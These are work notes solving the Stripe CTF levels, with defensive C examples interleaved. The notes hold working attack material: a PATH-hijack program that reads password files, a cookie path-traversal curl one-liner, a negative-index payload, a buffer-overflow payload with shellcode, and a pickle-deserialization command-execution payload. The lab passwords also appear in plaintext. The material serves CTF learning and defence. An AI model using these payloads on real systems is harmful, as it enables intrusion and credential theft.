Stripe CTF Challenge - Solutions to all Levels
Stripe CTF - Work Notes
mpetrov (petrov.michael@gmail.com)
These notes are very rough. They should give a general idea of how each level was solved.
---- LEVEL 01 (login: e9gx26YEb2) -----
Solution: modifying PATH env variable
Password: kxlVXUvzv
date.c
    #include <sys/types.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <stdlib.h>   /* declares system(); the original relied on an implicit declaration */

    int main(void) {
        /* print the real and effective ids the program is running with */
        printf(
            " UID GID \n"
            "Real %d Real %d \n"
            "Effective %d Effective %d \n",
            getuid (), getgid (),
            geteuid(), getegid()
        );
        system("ls -la /home/level02/");
        system("cat /home/level02/.password");
        return 0; /* always good to return something */
    }
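The hardened counterpart to the Level 01 bug, added here as an example (it is not the notes' code and not the challenge's own source): a privileged program that shells out to `date` resolves that name through whatever PATH the caller exported, which is exactly what the `date.c` above relies on. The fix is to stop depending on PATH at all: check it against an allowlist or, better, exec the command by absolute path with a fixed environment. `/bin/date`, the trusted-directory list and the function names are assumptions for this example.

```c
/* Added example: PATH hardening for a privileged program that runs an
 * external command. Not the notes' code; directory list and /bin/date are
 * assumptions chosen for the demonstration. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Directories a privileged program should be willing to search. */
static const char *const TRUSTED_DIRS[] = { "/usr/bin", "/bin", NULL };

/* Return 1 if every component of PATH is one of TRUSTED_DIRS, 0 otherwise.
 * An empty component ("" or a leading/trailing ':') means "current
 * directory" to the shell and is rejected, as is any relative or unknown
 * directory. */
int path_is_trusted(const char *path)
{
    if (path == NULL || *path == '\0')
        return 0;
    const char *p = path;
    for (;;) {
        const char *sep = strchr(p, ':');
        size_t len = sep ? (size_t)(sep - p) : strlen(p);
        if (len == 0)
            return 0;                      /* empty entry == cwd */
        int ok = 0;
        for (const char *const *d = TRUSTED_DIRS; *d; d++) {
            if (strlen(*d) == len && memcmp(*d, p, len) == 0) {
                ok = 1;
                break;
            }
        }
        if (!ok)
            return 0;
        if (!sep)
            return 1;
        p = sep + 1;
    }
}

/* Run an absolute-path command with a fixed environment, bypassing PATH
 * lookup entirely. Returns the child's exit status, or -1 on failure
 * (including a relative command name, which is refused up front). */
int run_trusted(const char *abs_path, char *const argv[])
{
    static char *const clean_env[] = {
        "PATH=/usr/bin:/bin",
        "IFS= \t\n",
        NULL
    };
    if (abs_path == NULL || abs_path[0] != '/')
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(abs_path, argv, clean_env);
        _exit(127);                        /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* The vulnerable shape is system("date"): the shell resolves "date"
     * through whatever PATH the unprivileged caller exported. */
    char *const argv[] = { "date", NULL };
    int rc = run_trusted("/bin/date", argv);
    printf("/bin/date exited with %d\n", rc);
    return rc == 0 ? 0 : 1;
}
```

Resetting PATH before `system()` would also have closed this hole, but `execve` with an explicit environment removes the shell from the picture entirely, so IFS, aliases and other shell-resolved state cannot be turned against the program either.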
---- LEVEL 02 (login: kxlVXUvzv) -----
Solution: set cookie to: ../../home/level03/.password
Password: Or0m4UX07b
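Level 02's bug is a file name taken straight from a cookie, so a `../../` prefix walks out of the intended directory. The block below is an added example, not the notes' or the level's code: the two checks a defender would put in front of that file read, an allowlist on the raw cookie value and a path normalization that confirms the joined result still sits under the base directory. The base directory `/var/www/uploads`, the 64-character limit and the function names are assumptions for this example.

```c
/* Added example: input validation and path containment for a file name
 * taken from a cookie. Not the notes' code; BASE_DIR and the length
 * limit are assumptions. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BASE_DIR "/var/www/uploads"   /* assumed storage directory */
#define MAXPATH  4096

/* Allowlist the raw cookie value: 1-64 chars from [A-Za-z0-9_-].
 * Rejects '/', '.', empty strings and anything else outright. */
int cookie_is_safe(const char *v)
{
    if (v == NULL)
        return 0;
    size_t n = strlen(v);
    if (n == 0 || n > 64)
        return 0;
    for (size_t i = 0; i < n; i++) {
        char c = v[i];
        int ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                 (c >= '0' && c <= '9') || c == '_' || c == '-';
        if (!ok)
            return 0;
    }
    return 1;
}

/* Defence in depth, independent of the allowlist: join base and name,
 * resolve ".", ".." and repeated slashes lexically, and require the result
 * to start with "<base>/". Purely lexical so it runs without a filesystem;
 * in a real service realpath(3) on the joined path gives the same check
 * against the actual tree (and follows symlinks, which this does not). */
int path_stays_under_base(const char *base, const char *name,
                          char *out, size_t outlen)
{
    char joined[MAXPATH];
    char *stack[MAXPATH / 2];
    int depth = 0;

    if (snprintf(joined, sizeof joined, "%s/%s", base, name) >= (int)sizeof joined)
        return 0;
    for (char *tok = strtok(joined, "/"); tok; tok = strtok(NULL, "/")) {
        if (strcmp(tok, ".") == 0)
            continue;
        if (strcmp(tok, "..") == 0) {
            if (depth > 0)
                depth--;
            continue;
        }
        stack[depth++] = tok;
    }
    size_t used = 0;
    out[0] = '\0';
    for (int i = 0; i < depth; i++) {
        int w = snprintf(out + used, outlen - used, "/%s", stack[i]);
        if (w < 0 || (size_t)w >= outlen - used)
            return 0;
        used += (size_t)w;
    }
    size_t blen = strlen(base);
    return strncmp(out, base, blen) == 0 && out[blen] == '/';
}

/* What the handler behind the cookie should ask before opening anything.
 * Returns 1 and fills resolved with the path to open, 0 to refuse. */
int user_file_allowed(const char *cookie, char *resolved, size_t len)
{
    if (!cookie_is_safe(cookie))
        return 0;
    return path_stays_under_base(BASE_DIR, cookie, resolved, len);
}

/* Same decision without exposing the path; used by the demo below. */
int user_file_decision(const char *cookie)
{
    char resolved[MAXPATH];
    return user_file_allowed(cookie, resolved, sizeof resolved);
}

int main(void)
{
    const char *samples[] = {            /* constructed cookie values */
        "mpetrov",
        "../../home/level03/.password",
        "a/../../etc/passwd",
        "",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-32s -> %s\n", samples[i],
               user_file_decision(samples[i]) ? "allowed" : "refused");
    return 0;
}
```

The allowlist alone already stops the traversal in the notes; the containment check is there so that a later change to the allowlist (say, permitting dots in names) cannot quietly reopen the hole.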
---- LEVEL 03 (login: Or0m4UX07b) -----
Solution: negative index exploit
Password: i5cBbPvPCpcP
ROUGH NOTES:
- target function (using nm): 0x804875b run
- use gdb to break in truncate_and_call
- step through a bit
- get pointer of buf
- compare to pointer of fns
- -0x70 difference, negative index exploit about to work
- array pointers are 4 bytes apart
- run -26 $'./a.out\n\x5b\x87\x04\x08'
---- LEVEL 04 (login: i5cBbPvPCpcP) -----
Solution: buffer overflow exploit
Password: fzfDGnSmd317
ROUGH NOTES:
- some overflow...
- system is 0x890cec83
- "smashing the stack for fun and profit"
- brute force isolation of return pointer (1037 th character)
$'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xd0\x23\x5d\xf7AAAAAAAAAAAA'
- printf("Usage: ./level04 STRING"); the "./level04" string is key (turned out to be irrelevant in the end)
- 0x080485b7: "./level04 STRING"
- gdb: x/x system 0xf75d23d0 <system>: 0x890cec83
- found "call *eax 804847f" in disassembly
- Shellcode creator: http://www.shell-storm.org/shellcode/files/utility-478.php
- Shellcode for "./a.out\n":
// 48 bytes
$'\x60\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x68\x2d\x63\x63\x63\x89\xe1\x52\xeb\x07\x51\x53\x89\xe1\xcd\x80\x61\xe8\xf4\xff\xff\xff\x2e\x2f\x61\x2e\x6f\x75\x74\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x7f\x84\x04\x08AAAAAAAAAAAA'
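Levels 03 and 04, as the notes describe them, both come down to a missing bound: Level 03 checks an index only from above, so a negative value reaches backwards from the function table into the buffer in front of it, and Level 04 copies an argument into a fixed buffer without checking its length. The block below is an added example (not the notes' code and not the levels' source) showing a constructed version of each shape next to its fix; the table of three handlers, the 64-byte buffer and all function names are assumptions chosen for the demonstration.

```c
/* Added example: both bounds on a table index, and a bounded copy that
 * refuses oversized input. Not the notes' code; handlers, table size and
 * buffer size are constructed for the demonstration. */
#include <ctype.h>
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* ---- Level 03 shape: a function table indexed by user input ---- */
typedef int (*handler_fn)(const char *);

static int h_length(const char *s) { return (int)strlen(s); }
static int h_first(const char *s)  { return s[0]; }
static int h_upper(const char *s)  /* count upper-case letters */
{
    int n = 0;
    for (; *s; s++)
        if (isupper((unsigned char)*s))
            n++;
    return n;
}

static handler_fn fns[] = { h_length, h_first, h_upper };
#define NUM_FNS 3     /* plain int constant, as the vulnerable shape has it */

/* Vulnerable check: only the upper bound. A signed index of -26 passes, and
 * fns[-26] would read a pointer from memory before the table (the notes'
 * "negative index exploit"). Only the decision is returned here; this
 * function never touches the table. */
int index_accepted_unsafe(int index)
{
    return index < NUM_FNS;
}

/* Fixed check: both bounds. */
int index_accepted_safe(int index)
{
    return index >= 0 && index < NUM_FNS;
}

/* Parse the index strictly: the whole string must be a decimal int. */
int parse_index(const char *s, int *out)
{
    char *end;
    errno = 0;
    long v = strtol(s, &end, 10);
    if (errno != 0 || end == s || *end != '\0' || v < INT_MIN || v > INT_MAX)
        return 0;
    *out = (int)v;
    return 1;
}

/* Dispatch with the safe check. Returns the handler's result, or -1 if refused. */
int dispatch(int index, const char *arg)
{
    if (!index_accepted_safe(index))
        return -1;
    return fns[index](arg);
}

/* ---- Level 04 shape: an argv string copied into a fixed buffer ---- */
#define ARG_MAX_LEN 64

/* Vulnerable shape (not called here): strcpy(buf, str) into char buf[64]
 * writes past the buffer for any str of 64 bytes or more; the 1037th byte
 * in the notes is where the saved return address was reached. */

/* Fixed: refuse rather than truncate. Truncation silently changes the
 * meaning of the input; refusal keeps the caller honest. */
int copy_bounded(char *dst, size_t dstlen, const char *src)
{
    size_t n = strlen(src);
    if (n >= dstlen)
        return 0;
    memcpy(dst, src, n + 1);
    return 1;
}

/* What a hardened level04 would do with argv[1]: 1 if accepted into the
 * 64-byte buffer, 0 if rejected. */
int handle_arg(const char *arg)
{
    char buf[ARG_MAX_LEN];
    if (!copy_bounded(buf, sizeof buf, arg))
        return 0;
    return 1;
}

int main(int argc, char **argv)
{
    if (argc != 3) {
        fprintf(stderr, "usage: %s INDEX STRING\n", argv[0]);
        return 1;
    }
    int index;
    if (!parse_index(argv[1], &index) || !handle_arg(argv[2])) {
        fprintf(stderr, "refused\n");
        return 1;
    }
    printf("handler %d -> %d\n", index, dispatch(index, argv[2]));
    return 0;
}
```

Note that declaring `NUM_FNS` as a `size_t` would make the one-sided check reject -26 by accident (the int converts to a huge unsigned value), which is why the explicit `index >= 0` belongs in the code rather than being left to conversion rules. Compiler mitigations (`-fstack-protector-strong`, `-D_FORTIFY_SOURCE=2`, PIE and full RELRO) raise the cost of the Level 04 overflow but do not replace the length check.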
---- LEVEL 05 (login: fzfDGnSmd317) -----
Solution: unpickle exploit
Password: SF2w8qU1QDj
ROUGH NOTES:
- touch result.txt
- chmod 777 result.txt
- curl localhost:9020 -d $'test; job: cos\nsystem\n(S\'/tmp/tmp.jbvQGmqMNk/a.out\'\ntR.'
- exploit code (primitive but works):
    #include <sys/types.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <stdlib.h>   /* declares system(); the original relied on an implicit declaration */

    int main(void) {
        /* print the real and effective ids the program is running with */
        printf(
            " UID GID \n"
            "Real %d Real %d \n"
            "Effective %d Effective %d \n",
            getuid (), getgid (),
            geteuid(), getegid()
        );
        system("ls -la /home/level06/ >> /tmp/tmp.jbvQGmqMNk/result.txt");
        system("cat /home/level06/.password >> /tmp/tmp.jbvQGmqMNk/result.txt");
        return 0; /* always good to return something */
    }
cat result.txt
- SUCCESS!
---- LEVEL 06 (login: SF2w8qU1QDj) -----
Solution: timing attack on the fork system call
Details: https://gist.github.com/1899389
Password: theflagl0eFTtT5oi0nOTxO5
ROUGH NOTES:
- had to ssh through level05 for some reason (this was fixed later)
- if stdout and stderr can be blocking then we can time their outputs and find where the wrong characters are
- http://stackoverflow.com/questions/280571/how-to-control-popen-stdin-stdout-stderr-redirection
- http://stackoverflow.com/questions/4057985/disabling-stdout-buffering-of-a-forked-process
- https://bugzilla.redhat.com/attachment.cgi?id=91467
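What Level 06 comes down to, per the notes, is a password check whose observable behaviour (here the timing of its output) depends on how many leading characters of the guess are right. The block below is an added example, not the notes' code or the level's source: the early-exit comparison that has that property next to a constant-time one, each reporting how many bytes it actually processed so the difference is visible, and a `check_password` wrapper that compares fixed-width zero-padded buffers so a guess of the wrong length costs the same work as one of the right length. The secret string and the 64-byte field width are constructed for the example.

```c
/* Added example: early-exit versus constant-time comparison, and a password
 * check whose work does not depend on where the guess goes wrong. Not the
 * notes' code; the secret and FIELD width are constructed. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define FIELD 64   /* fixed comparison width; longer inputs are rejected */

/* Leaky shape: stops at the first mismatch. The iteration count, and any
 * per-iteration side effect (an output write, a fork), reveal the position
 * of the first wrong byte. *steps reports the iterations performed. */
int compare_early_exit(const unsigned char *a, const unsigned char *b,
                       size_t n, size_t *steps)
{
    *steps = 0;
    for (size_t i = 0; i < n; i++) {
        (*steps)++;
        if (a[i] != b[i])
            return 0;
    }
    return 1;
}

/* Constant-time shape: touches every byte, accumulates differences with
 * OR, takes no data-dependent branch. volatile keeps the compiler from
 * turning the loop back into an early exit. */
int compare_constant_time(const unsigned char *a, const unsigned char *b,
                          size_t n, size_t *steps)
{
    volatile unsigned char diff = 0;
    *steps = 0;
    for (size_t i = 0; i < n; i++) {
        (*steps)++;
        diff |= (unsigned char)(a[i] ^ b[i]);
    }
    return diff == 0;
}

/* Copy s into a zero-filled FIELD-byte buffer; 0 if it does not fit. */
static int pad_field(const char *s, unsigned char out[FIELD])
{
    size_t n = strlen(s);
    if (n > FIELD)
        return 0;
    memset(out, 0, FIELD);
    memcpy(out, s, n);
    return 1;
}

/* Password check with a fixed amount of work regardless of where (or
 * whether) the guess differs. Zero padding means a guess that is a prefix
 * of the secret, or longer than it, differs in the padding region, so
 * length is covered by the same constant-time pass. The only early
 * return is for a guess longer than FIELD, which depends on the guess alone. */
int check_password(const char *secret, const char *guess)
{
    unsigned char a[FIELD], b[FIELD];
    size_t steps;
    if (!pad_field(secret, a) || !pad_field(guess, b))
        return 0;
    return compare_constant_time(a, b, FIELD, &steps);
}

/* For demonstration: bytes processed by each comparison for a guess. */
size_t steps_early_exit(const char *secret, const char *guess)
{
    unsigned char a[FIELD], b[FIELD];
    size_t steps = 0;
    if (!pad_field(secret, a) || !pad_field(guess, b))
        return 0;
    compare_early_exit(a, b, FIELD, &steps);
    return steps;
}

size_t steps_constant_time(const char *secret, const char *guess)
{
    unsigned char a[FIELD], b[FIELD];
    size_t steps = 0;
    if (!pad_field(secret, a) || !pad_field(guess, b))
        return 0;
    compare_constant_time(a, b, FIELD, &steps);
    return steps;
}

int main(void)
{
    const char *secret = "correct-horse-battery";      /* constructed */
    const char *guesses[] = {
        "aaaaaaaaaaaaaaaaaaaaa",
        "correct-aaaaaaaaaaaaa",
        "correct-horse-batterx",
        "correct-horse-battery",
    };
    for (size_t i = 0; i < sizeof guesses / sizeof guesses[0]; i++)
        printf("%-24s early-exit=%2zu constant-time=%2zu match=%d\n",
               guesses[i], steps_early_exit(secret, guesses[i]),
               steps_constant_time(secret, guesses[i]),
               check_password(secret, guesses[i]));
    return 0;
}
```

The early-exit column grows by one for each correct leading byte, which is the signal the notes exploit; the constant-time column is 64 for every guess. In a real service the stored value would be a password hash compared this way, rather than the plaintext.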
@evandrix

One-liner for level 02: curl --digest -u level02 -b user_details='../../home/level03/.password' http://ctf.stri.pe/level02.php
